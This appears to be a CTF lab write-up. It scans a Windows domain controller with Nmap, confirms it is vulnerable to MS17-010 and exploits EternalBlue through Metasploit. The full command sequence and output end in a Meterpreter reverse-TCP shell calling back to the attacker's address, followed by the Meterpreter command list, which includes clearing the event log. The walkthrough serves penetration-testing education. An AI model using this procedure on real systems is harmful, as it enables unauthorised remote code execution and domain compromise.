In the previous article, we found the ransomware key, and now we are on the hunt for the Windows AD domain controller to decrypt the research data, which also contains the flag. In this article, we will concentrate on the host named Cayenne.
Discovery
Since we already performed host discovery, we do not need to do it again. However, we still need to figure out which of the three remaining hosts are Windows-based. A quick first indicator is the TTL in a ping reply, as shown below. It is a heuristic rather than proof, so we confirm it with a port scan afterwards.
andrew@kali:~$ ping -c 1 172.20.20.24 | grep ttl; ping -c 1 172.20.20.35 | grep ttl; ping -c 1 172.20.20.37 | grep ttl
64 bytes from 172.20.20.24: icmp_seq=1 ttl=63 time=17.31 ms
64 bytes from 172.20.20.35: icmp_seq=1 ttl=127 time=23.7 ms
64 bytes from 172.20.20.37: icmp_seq=1 ttl=127 time=20.76 ms
Nping
Alternatively, we can use Nping, an open-source tool for network packet generation, response analysis and response time measurement. It is part of the Nmap suite and is in the default Kali Linux installation. Sending raw ICMP echo requests needs root privileges, hence the sudo.
andrew@kali:~$ sudo nping 172.20.20.22 172.20.20.24 172.20.20.35 172.20.20.37 --icmp -c 1 | grep reply
RCVD (1.0066s) ICMP [172.20.20.24 > 10.10.10.2 Echo reply (type=0/code=0) id=35881 seq=1] IP [ttl=63 id=46377 iplen=28 ]
RCVD (2.0085s) ICMP [172.20.20.35 > 10.10.10.2 Echo reply (type=0/code=0) id=512 seq=1] IP [ttl=127 id=9127 iplen=28 ]
RCVD (3.0112s) ICMP [172.20.20.37 > 10.10.10.2 Echo reply (type=0/code=0) id=29653 seq=1] IP [ttl=127 id=16002 iplen=28 ]
Both commands gave us the same information. What we are looking at is the TTL (time to live) value of each reply. Operating systems ship with different initial TTL values: most Linux-based systems start at 64, while Windows has used 128 for more than 20 years. Note that 172.20.20.22 did not answer the echo request at all, which is why only three replies appear in the Nping output.
As you may have noticed, the ping and Nping results show 63 and 127 rather than 64 and 128. Every router that forwards a packet (more precisely, every Layer 3 hop, which includes a routing firewall) decrements the TTL by one, so a value one below a default means the reply crossed a single router; here that is the VPN router that Nmap's traceroute lists later as hop 1. Keep in mind that the TTL is only a hint: it can be changed on the host, and a NAT device or load balancer may be the one answering instead of the host itself.
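The TTL rule of thumb above is easy to script. The Python below is an added example, not code from the original write-up: it parses ping and Nping reply lines (the sample input is the replies shown above, embedded as a string), maps each TTL to the nearest common initial value and derives the hop count. The 255 entry for network devices and Solaris is my addition to the 64/128 pair discussed in the text.

```python
import re

# Common initial TTLs (a heuristic, not a standard): Linux/Unix 64, Windows 128,
# many network devices and Solaris 255. Any of them can be changed by an admin.
DEFAULT_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "network device/Solaris"}

# Constructed sample: the ping and Nping reply lines from the scan above.
SAMPLE_REPLIES = """
64 bytes from 172.20.20.24: icmp_seq=1 ttl=63 time=17.31 ms
64 bytes from 172.20.20.35: icmp_seq=1 ttl=127 time=23.7 ms
64 bytes from 172.20.20.37: icmp_seq=1 ttl=127 time=20.76 ms
RCVD (1.0066s) ICMP [172.20.20.24 > 10.10.10.2 Echo reply (type=0/code=0) id=35881 seq=1] IP [ttl=63 id=46377 iplen=28 ]
"""

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def guess_from_ttl(ttl):
    """Map an observed TTL to (os_family, hops).

    The smallest default TTL that is >= the observed value is assumed to be
    the starting value; the difference is the number of routers crossed.
    """
    for initial in sorted(DEFAULT_TTLS):
        if ttl <= initial:
            return DEFAULT_TTLS[initial], initial - ttl
    return "unknown", 0


def triage(output):
    """Parse ping/nping reply lines into {ip: {"ttl", "guess", "hops"}}.

    For both tools the first IPv4 address on a reply line is the responder
    (ping: "64 bytes from <ip>", nping: "RCVD ... [<ip> > <us> ...]").
    """
    results = {}
    for line in output.splitlines():
        ttl_m = TTL_RE.search(line)
        ip_m = IPV4_RE.search(line)
        if not (ttl_m and ip_m):
            continue
        ttl = int(ttl_m.group(1))
        family, hops = guess_from_ttl(ttl)
        results[ip_m.group(1)] = {"ttl": ttl, "guess": family, "hops": hops}
    return results


if __name__ == "__main__":
    for ip, info in sorted(triage(SAMPLE_REPLIES).items()):
        print(f"{ip:<15} ttl={info['ttl']:<3} {info['guess']} ({info['hops']} hop(s) away)")
```

Pipe real output into it (ping -c 1 host | python3 ttl_triage.py would need a stdin reader, which is the obvious extension) and treat the result as a reason to run nmap -O, not as a conclusion.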
Port scanning
While the last two hosts are probably Windows, we still need a scan to verify it. As in the first article of the Kaos Corp series, we use Nmap for the port scan and for OS and service detection. The -A option enables OS detection, version detection, the default scripts and traceroute; OS detection needs raw sockets, hence the sudo.
sudo nmap -A 172.20.20.35 172.20.20.37
andrew@kali:~$ sudo nmap -A 172.20.20.35 172.20.20.37
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 18:55 PST
Nmap scan report for 172.20.20.35
Host is up (0.0059s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: SCOVILLE)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1036/tcp open  msrpc        Microsoft Windows RPC
1045/tcp open  msrpc        Microsoft Windows RPC
1060/tcp open  msrpc        Microsoft Windows RPC
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5901/tcp open  vnc          VNC (protocol 3.8)
| vnc-info:
|   Protocol version: 3.8
|   Security types:
|     None (1)
|     Tight (16)
|   Tight auth subtypes:
|     None
|_  WARNING: Server does not require authentication
8888/tcp open  bindshell    Microsoft Windows 6.1.7601 cmd.exe (**BACKDOOR**)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/2%OT=135%CT=1%CU=40101%PV=Y%DS=2%DC=T%G=Y%TM=61A987
OS:C2%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=7)OP
OS:S(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW
OS:8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)EC
OS:N(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: ANAHEIM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 9h45m27s, deviation: 4h37m08s, median: 7h05m26s
|_nbstat: NetBIOS name: ANAHEIM, NetBIOS user: , NetBIOS MAC: 26:e3:1a:66:90:93 (unknown)
| smb-os-discovery:
|   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: anaheim
|   NetBIOS computer name: ANAHEIM\x00
|   Domain name: scoville.local
|   Forest name: scoville.local
|   FQDN: anaheim.scoville.local
|_  System time: 2021-12-12T02:03:21-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-12-12T10:03:22
|_  start_date: 2021-09-22T07:29:37

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   7.82 ms  vyos-r1.networkjutsu.com (10.10.10.1)
2   17.08 ms 172.20.20.35

Nmap scan report for 172.20.20.37
Host is up (0.0055s latency).
Not shown: 973 closed ports
PORT      STATE SERVICE            VERSION
7/tcp     open  echo
9/tcp     open  discard?
13/tcp    open  daytime            Microsoft Windows USA daytime
17/tcp    open  qotd               Windows qotd (English)
19/tcp    open  chargen
53/tcp    open  domain             Simple DNS Plus
80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec       Microsoft Windows Kerberos (server time: 2021-12-12 10:00:38Z)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
389/tcp   open  ldap               Microsoft Windows Active Directory LDAP (Domain: scoville.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds       Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: SCOVILLE)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap               Microsoft Windows Active Directory LDAP (Domain: scoville.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: SCOVILLE
|   NetBIOS_Domain_Name: SCOVILLE
|   NetBIOS_Computer_Name: CAYENNE
|   DNS_Domain_Name: scoville.local
|   DNS_Computer_Name: cayenne.scoville.local
|   DNS_Tree_Name: scoville.local
|   Product_Version: 6.3.9600
|_  System_Time: 2021-12-12T10:03:21+00:00
| ssl-cert: Subject: commonName=cayenne.scoville.local
| Not valid before: 2021-09-21T05:35:58
|_Not valid after:  2022-03-23T05:35:58
|_ssl-date: 2021-12-12T10:03:36+00:00; +7h05m27s from scanner time.
6000/tcp  open  ftp                FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 domain
| drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging
| drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging areas
|_drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 sysvol
|_ftp-bounce: bounce working!
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49157/tcp open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/2%OT=7%CT=1%CU=40250%PV=Y%DS=2%DC=T%G=Y%TM=61A987C2
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=I%II=I%SS=S%TS=7)OPS(O
OS:1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST
OS:11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R
OS:=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: CAYENNE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h41m26s, deviation: 3h34m39s, median: 7h05m26s
|_nbstat: NetBIOS name: CAYENNE, NetBIOS user: , NetBIOS MAC: 8e:e8:2a:68:89:c5 (unknown)
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: cayenne
|   NetBIOS computer name: CAYENNE\x00
|   Domain name: scoville.local
|   Forest name: scoville.local
|   FQDN: cayenne.scoville.local
|_  System time: 2021-12-12T02:03:21-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-12-12T10:03:21
|_  start_date: 2021-09-22T07:27:37

TRACEROUTE (using port 554/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 172.20.20.35
2   7.00 ms 172.20.20.37

Post-scan script results:
| clock-skew:
|   9h45m27s:
|     172.20.20.35
|_    172.20.20.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 186.73 seconds
Our Nmap results confirm that both hosts run Windows: 172.20.20.35 (ANAHEIM) is a Windows 7 SP1 workstation and 172.20.20.37 (CAYENNE) is Windows Server 2012 R2 (build 9600). CAYENNE is the domain controller for scoville.local: it serves DNS (53), Kerberos (88), LDAP (389/636) and the Global Catalog (3268/3269). The scan also surfaces findings worth keeping in mind. ANAHEIM exposes a VNC server that requires no authentication (5901), a cmd.exe bind shell that Nmap flags as a backdoor (8888), and does not require SMB signing. CAYENNE allows anonymous FTP on port 6000 with a sysvol directory listed, and its clock is roughly seven hours off from our scanner, which would break Kerberos authentication from our box (the default tolerance is five minutes) unless we sync to it.
More scanning
The domain controller runs Windows Server 2012 R2, an older release, but the version alone does not tell us whether it is patched. Nmap's NSE scripts can check for specific, known issues, so we will use Nmap again for that.
SMB (Server Message Block) has had many security vulnerabilities over the years, so the first thing to check is which SMB dialects the server still accepts; SMBv1 in particular should be disabled on any current system. Nmap's smb-protocols script does this, as shown below.
nmap 172.20.20.37 -p 445 --script=smb-protocols
andrew@kali:~$ nmap 172.20.20.37 -p 445 --script=smb-protocols
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 20:15 PST
Nmap scan report for 172.20.20.37
Host is up (0.0055s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|     2.10
|     3.00
|_    3.02

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Now that we know SMBv1 is still enabled, we can use ExploitDB to hunt for SMB vulnerabilities. In this example, I searched for the term SMB and ticked the Verified check box to limit the results.

Skimming the results, EternalBlue stands out. Many IT professionals have heard of it because of WannaCry, but those outside system administration or security roles may not associate the name with an SMBv1 vulnerability, so it is not necessarily obvious.
Now that we have a candidate vulnerability, let's use Nmap's smb-vuln-ms17-010 script to verify that the host is actually unpatched before we try to exploit it.
nmap 172.20.20.37 -p 445 --script smb-vuln-ms17-010
andrew@kali:~$ nmap 172.20.20.37 -p 445 --script smb-vuln-ms17-010
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-13 19:56 PST
Nmap scan report for 172.20.20.37
Host is up (0.0026s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Our Nmap results confirm that the domain controller is missing the MS17-010 patch. MS17-010 is the Microsoft security bulletin that fixed the SMBv1 flaws CVE-2017-0143 through CVE-2017-0148; EternalBlue is the leaked exploit for one of them (CVE-2017-0144), and the name is commonly used for the whole issue. Now, let's see if we can use Metasploit to exploit it.
Exploitation
As mentioned in my previous article, I did not know how to use Metasploit at the time of the CTF event, but I started learning it during the event because of this Cayenne host.
To start using Metasploit, we need to launch it. I typically use the msfconsole -q command to do this; the -q option suppresses the banner. Depending on your Kali version, you may need to set up the database first with msfdb init (or msfdb start if it already exists). Without the database, search still works, but Metasploit warns that it is falling back to its slower module cache.
andrew@kali:~$ msfconsole -q
msf6 >
Searching for exploit
Once you see the msf6 prompt, use the search function. Here is an example of me searching for the EternalBlue exploit.
msf6 > search type:exploit ms17-010
msf6 > search type:exploit ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce
Alternatively, we can use eternalblue as the keyword. It displays the same three modules.
msf6 > search type:exploit eternalblue
msf6 > search type:exploit eternalblue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce
The simplest form is search followed by a keyword, as shown below. This displays every module that matches, auxiliary modules included; the type:exploit filter used earlier restricted the list to exploit modules. Note auxiliary/scanner/smb/smb_ms17_010 in the list: it is a check equivalent to the Nmap script we just ran, and the exploit module runs it itself before firing.
msf6 > search eternalblue
msf6 > search eternalblue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Using the exploit
The exploit module most likely to work is ms17_010_eternalblue, the first in the list. Before using it, read its description with the info command, as shown below. Pay attention to the Rank (average) and to the warning that the exploit may need several attempts and can crash the target: on a real engagement, a BSOD on the only domain controller is a serious outage, so get explicit approval before running it.
msf6 > info 0
msf6 > info 0

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  Sean Dillon
  Dylan Davis
  thelightcosine
  wvu
  agalway-r7
  cdelafuente-r7
  cdelafuente-r7
  agalway-r7

Available targets:
  Id  Name
  --  ----
  0   Automatic Target
  1   Windows 7
  2   Windows Embedded Standard 7
  3   Windows Server 2008 R2
  4   Windows 8
  5   Windows 8.1
  6   Windows Server 2012
  7   Windows 10 Pro
  8   Windows 10 Enterprise Evaluation

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT          445              yes       The target port (TCP)
  SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, part of
  the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow
  memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in
  Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is
  subtracted into a WORD. The kernel pool is groomed so that overflow is
  well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
  completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the
  original may not trigger 100% of the time, and should be run continuously
  until triggered. It seems like the pool will get hot streaks and need a
  cool down period before the shells rain in again. The module will attempt
  to use Anonymous login, by default, to authenticate to perform the exploit.
  If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain
  options it will use those instead. On some systems, this module may cause
  system instability and crashes, such as a BSOD or a reboot. This may be
  more likely with some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://github.com/RiskSense-Ops/MS17-010
  https://www.exploit-db.com/exploits/42030

Also known as:
  ETERNALBLUE
Upon reading the information, this looks like the right exploit module for this Windows domain controller: Windows Server 2012 is among its listed targets. Let's go ahead and use it by issuing the command below. Note that Metasploit picks a 64-bit staged Meterpreter reverse TCP payload by default, which matches the x64 target.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Before we can run the exploit, we need to modify the settings. Exploit modules have different options, but some are common to most of them, like RHOSTS, RPORT, LHOST and LPORT. Since we do not know the options available for this exploit module, let's find out using the command shown below.
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.229    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target
Alternatively, we can issue show options to display the same output.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Before we run the exploit module, we need to make some changes. At a minimum, we need to set RHOSTS and LHOST for this exploit to succeed (the option is called RHOSTS here, but set rhost works too, since Metasploit treats it as an alias).
RHOSTS is the target's IP address, in this case 172.20.20.37. LHOST is the address our handler listens on and that the payload will connect back to, so it must be an address the target can reach. The default, 192.168.8.229, is our LAN interface, which the target cannot route to; we set it to our VPN address, 10.10.10.2, instead. With the wrong LHOST the exploit can succeed and still never yield a session, because the reverse connection goes nowhere. To change the settings, issue the commands shown below.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 172.20.20.37
rhost => 172.20.20.37
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.10.2
lhost => 10.10.10.2
We are now ready to run the exploit module with the run command (exploit is a synonym). Since this module supports a check, you can also issue check first to get the vulnerability verdict without exploiting; as the output below shows, run performs that same check before it fires.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.10.2:4444
[*] 172.20.20.37:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.20.20.37:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit)
[*] 172.20.20.37:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.20.20.37:445 - The target is vulnerable.
[*] 172.20.20.37:445 - shellcode size: 1283
[*] 172.20.20.37:445 - numGroomConn: 12
[*] 172.20.20.37:445 - Target OS: Windows Server 2012 R2 Standard 9600
[+] 172.20.20.37:445 - got good NT Trans response
[+] 172.20.20.37:445 - got good NT Trans response
[+] 172.20.20.37:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.20.20.37:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.20.20.37:445 - good response status for nx: INVALID_PARAMETER
[+] 172.20.20.37:445 - good response status for nx: INVALID_PARAMETER
[*] Sending stage (200262 bytes) to 172.20.20.37
[*] Meterpreter session 1 opened (10.10.10.2:4444 -> 172.20.20.37:51316 ) at 2021-12-13 23:21:10 -0800

meterpreter >
Meterpreter shell
The meterpreter prompt means the module successfully exploited the vulnerability and the payload connected back to our handler on 10.10.10.2:4444. Here the Windows Server 2012 R2 target went down on the first attempt.
Note
You may need to issue run a few times to get the Meterpreter shell; as the module description says, the kernel pool grooming does not trigger every time.
There are many commands available in the Meterpreter shell. If you are unfamiliar with it, type a question mark and press Enter to view the help menu.
meterpreter > ?
meterpreter > ?

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
